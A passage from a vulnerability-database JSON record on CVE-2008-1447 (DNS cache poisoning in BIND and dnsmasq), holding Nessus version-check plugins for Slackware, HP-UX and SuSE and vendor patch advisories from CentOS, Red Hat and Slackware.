value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0,\n10.1, 10.2, 11.0, 12.0, 12.1, and -current to address a security\nproblem.\"\n );\n # http://www.isc.org/sw/bind/bind-security.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.isc.org/downloads/bind/bind-security.php\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.539239\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96fdcaf5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:10.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:11.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:9.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/05/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"8.1\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i386\", pkgnum:\"1_slack8.1\")) flag++;\n\nif (slackware_check(osver:\"9.0\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i386\", pkgnum:\"1_slack9.0\")) flag++;\n\nif (slackware_check(osver:\"9.1\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack9.1\")) flag++;\n\nif (slackware_check(osver:\"10.0\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack10.0\")) flag++;\n\nif (slackware_check(osver:\"10.1\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack10.1\")) flag++;\n\nif (slackware_check(osver:\"10.2\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack10.2\")) flag++;\n\nif (slackware_check(osver:\"11.0\", pkgname:\"bind\", pkgver:\"9.3.5_P1\", pkgarch:\"i486\", pkgnum:\"1_slack11.0\")) flag++;\n\nif (slackware_check(osver:\"12.0\", pkgname:\"bind\", pkgver:\"9.4.2_P1\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"bind\", pkgver:\"9.4.2_P1\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif 
(slackware_check(osver:\"current\", pkgname:\"bind\", pkgver:\"9.4.2_P1\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:slackware_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-12T11:32:07", "description": "s700_800 11.23 Bind 9.2.0 components : \n\nA potential security vulnerability has been identified with HP-UX\nrunning BIND. The vulnerability could be exploited remotely to cause\nDNS cache poisoning.", "edition": 25, "cvss3": {"score": 6.8, "vector": "AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"}, "published": "2008-08-12T00:00:00", "title": "HP-UX PHNE_37865 : HP-UX Running BIND, Remote DNS Cache Poisoning (HPSBUX02351 SSRT080058 rev.6)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2008-08-12T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHNE_37865.NASL", "href": "https://www.tenable.com/plugins/nessus/33864", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHNE_37865. 
The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33864);\n script_version(\"1.36\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_bugtraq_id(30131);\n script_xref(name:\"HP\", value:\"emr_na-c01506861\");\n script_xref(name:\"HP\", value:\"HPSBUX02351\");\n script_xref(name:\"HP\", value:\"SSRT080058\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"HP-UX PHNE_37865 : HP-UX Running BIND, Remote DNS Cache Poisoning (HPSBUX02351 SSRT080058 rev.6)\");\n script_summary(english:\"Checks for the patch in the swlist output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote HP-UX host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"s700_800 11.23 Bind 9.2.0 components : \n\nA potential security vulnerability has been identified with HP-UX\nrunning BIND. 
The vulnerability could be exploited remotely to cause\nDNS cache poisoning.\"\n );\n # http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01506861\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8a80e2e7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install patch PHNE_37865 or subsequent.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:hp:hp-ux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_modification_date\", value:\"2010/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"HP-UX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/HP-UX/version\", \"Host/HP-UX/swlist\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"hpux.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/HP-UX/version\")) audit(AUDIT_OS_NOT, \"HP-UX\");\nif (!get_kb_item(\"Host/HP-UX/swlist\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif (!hpux_check_ctx(ctx:\"11.23\"))\n{\n exit(0, \"The host is not affected since PHNE_37865 applies to a different OS release.\");\n}\n\npatches = make_list(\"PHNE_37865\", \"PHNE_40089\", \"PHNE_40339\", \"PHNE_41721\", \"PHNE_42727\", \"PHNE_43096\", \"PHNE_43278\", \"PHNE_43369\");\nforeach patch (patches)\n{\n if (hpux_installed(app:patch))\n {\n exit(0, \"The host is not affected because patch \"+patch+\" is installed.\");\n }\n}\n\n\nflag = 0;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-ENG-A-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-JPN-E-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INET-JPN-S-MAN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-INETD\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS-RUN\", version:\"B.11.23\")) flag++;\nif (hpux_check_patch(app:\"InternetSrvcs.INETSVCS2-RUN\", version:\"B.11.23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:hpux_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-01-17T14:02:16", "description": "The transaction id and the udp source port used for DNS queries by the\nbind nameserver were predictable. 
Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).\n\nAdditionally the root.hint zone file was updated to contain the new IP\nnumber of the 'L' root DNS server.", "edition": 24, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : bind (YOU Patch Number 12197)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12197.NASL", "href": "https://www.tenable.com/plugins/nessus/41221", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41221);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-1447\");\n script_xref(name:\"IAVA\", value:\"2008-A-0045\");\n\n script_name(english:\"SuSE9 Security Update : bind (YOU Patch Number 12197)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The transaction id and the udp source port used for DNS queries by the\nbind nameserver were predictable. 
Attackers could potentially exploit\nthat weakness to manipulate the DNS cache ('DNS cache poisoning',\nCVE-2008-1447).\n\nAdditionally the root.hint zone file was updated to contain the new IP\nnumber of the 'L' root DNS server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-1447.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12197.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/07/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"bind-9.3.4-4.8\")) 
flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"bind-devel-9.3.4-4.8\")) flag++;\nif (rpm_check(release:\"SUSE9\", reference:\"bind-utils-9.3.4-4.8\")) flag++;\nif (rpm_check(release:\"SUSE9\", cpu:\"x86_64\", reference:\"bind-utils-32bit-9-200806172350\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:28", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533-03\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. 
In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027120.html\n\n**Affected packages:**\nbind\nbind-devel\nbind-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 3, "modified": "2008-07-09T01:20:56", "published": "2008-07-09T01:20:56", "href": "http://lists.centos.org/pipermail/centos-announce/2008-July/027120.html", "id": "CESA-2008:0533-03", "title": "bind security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-12-08T03:33:58", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "**CentOS Errata and Security Advisory** CESA-2008:0533\n\n\nISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. 
In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027114.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027115.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027116.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027117.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027118.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027119.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027121.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027122.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027126.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027127.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027128.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/027129.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039473.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-July/039474.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\nselinux-policy\nselinux-policy-devel\nselinux-policy-mls\nselinux-policy-strict\nselinux-policy-targeted\nselinux-policy-targeted-sources\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0533.html", "edition": 4, "modified": "2008-07-12T12:47:34", "published": "2008-07-08T22:25:27", "href": 
"http://lists.centos.org/pipermail/centos-announce/2008-July/027115.html", "id": "CESA-2008:0533", "title": "bind, caching, selinux security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is a lightweight DNS forwarder and DHCP server. It is designed to\nprovide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have made\nDNS spoofing attacks easier. dnsmasq has been updated to use random UDP\nsource ports, helping to make DNS spoofing attacks harder. (CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, which\nupgrades dnsmasq to version 2.45 and resolves this issue.", "modified": "2017-09-08T12:13:40", "published": "2008-08-11T04:00:00", "id": "RHSA-2008:0789", "href": "https://access.redhat.com/errata/RHSA-2008:0789", "type": "redhat", "title": "(RHSA-2008:0789) Moderate: dnsmasq security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:45:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. 
In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.", "modified": "2019-03-22T23:42:40", "published": "2008-07-08T04:00:00", "id": "RHSA-2008:0533", "href": "https://access.redhat.com/errata/RHSA-2008:0533", "type": "redhat", "title": "(RHSA-2008:0533) Important: bind security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "slackware": [{"lastseen": "2020-10-25T16:36:02", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New dnsmasq packages are available for Slackware 10.0, 10.1, 10.2, 11.0,\n12.0, 12.1, and -current to address possible DNS cache poisoning issues.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz:\n Upgraded to dnsmasq-2.45.\n It was discovered that earlier versions of dnsmasq have DNS cache\n weaknesses that are similar to the ones recently discovered in BIND.\n This new release minimizes the risk of cache poisoning.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. 
This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/dnsmasq-2.45-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/dnsmasq-2.45-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/dnsmasq-2.45-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/dnsmasq-2.45-i486-1_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/dnsmasq-2.45-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/dnsmasq-2.45-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/dnsmasq-2.45-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 10.0 package:\ne1f567c3679e23ab3f80a86cec1343c4 dnsmasq-2.45-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\naabb7b9b872654b9b663014d49ba37c1 dnsmasq-2.45-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\n41c8042baabfdbdeb7b59f2fd48cbc08 dnsmasq-2.45-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nfab50ae940bde92eabba0c062908ef42 dnsmasq-2.45-i486-1_slack11.0.tgz\n\nSlackware 12.0 package:\nb8e850a726270c0d7e305a7c6523ede4 dnsmasq-2.45-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n1c61011340f57e4179c788f3f0127dc0 dnsmasq-2.45-i486-1_slack12.1.tgz\n\nSlackware 
-current package:\n11fe1505a7177ec1a1c84a1b259b9c03 dnsmasq-2.45-i486-1.tgz\n\n\nInstallation instructions:\n\nUpgrade the packages as root:\n > upgradepkg dnsmasq-2.45-i486-1_slack12.1.tgz\n\nRestart dnsmasq:\n > sh /etc/rc.d/rc.dnsmasq restart", "modified": "2008-07-24T00:02:47", "published": "2008-07-24T00:02:47", "id": "SSA-2008-205-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.452680", "type": "slackware", "title": "[slackware-security] dnsmasq", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-25T16:36:05", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "New bind packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, and -current to address a security problem.\n\nMore details may be found at the following links:\n\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n\n\nHere are the details from the Slackware 12.1 ChangeLog:\n\npatches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz:\n Upgraded to bind-9.4.2-P1.\n This upgrade addresses a security flaw known as the CERT VU#800113 DNS Cache\n Poisoning Issue. This is the summary of the problem from the BIND site:\n \"A weakness in the DNS protocol may enable the poisoning of caching\n recursive resolvers with spoofed data. 
DNSSEC is the only full solution.\n New versions of BIND provide increased resilience to the attack.\"\n It is suggested that sites that run BIND upgrade to one of the new packages\n in order to reduce their exposure to DNS cache poisoning attacks.\n For more information, see:\n http://www.isc.org/sw/bind/bind-security.php\n http://www.kb.cert.org/vuls/id/800113\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nUpdated package for 
Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/bind-9.4.2_P1-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/bind-9.4.2_P1-i486-1_slack12.1.tgz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.4.2_P1-i486-1.tgz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\nc693e1ae4997c7cc23c0051ec1c90796 bind-9.3.5_P1-i386-1_slack8.1.tgz\n\nSlackware 9.0 package:\n24326f563c6588a0541f3409bc7298cd bind-9.3.5_P1-i386-1_slack9.0.tgz\n\nSlackware 9.1 package:\n67178dd97006cf4cf3543704c82741b8 bind-9.3.5_P1-i486-1_slack9.1.tgz\n\nSlackware 10.0 package:\na12c9e8304c5a7e285fa4df7d4b9756b bind-9.3.5_P1-i486-1_slack10.0.tgz\n\nSlackware 10.1 package:\n6209e4a5f9693451279b0d02795b9bd8 bind-9.3.5_P1-i486-1_slack10.1.tgz\n\nSlackware 10.2 package:\ne1c6d74c787fa3b7f3a5905fef206206 bind-9.3.5_P1-i486-1_slack10.2.tgz\n\nSlackware 11.0 package:\nd354a0118388bb0f3fd32fa79166746a bind-9.3.5_P1-i486-1_slack11.0.tgz\n\nSlackware 12.0 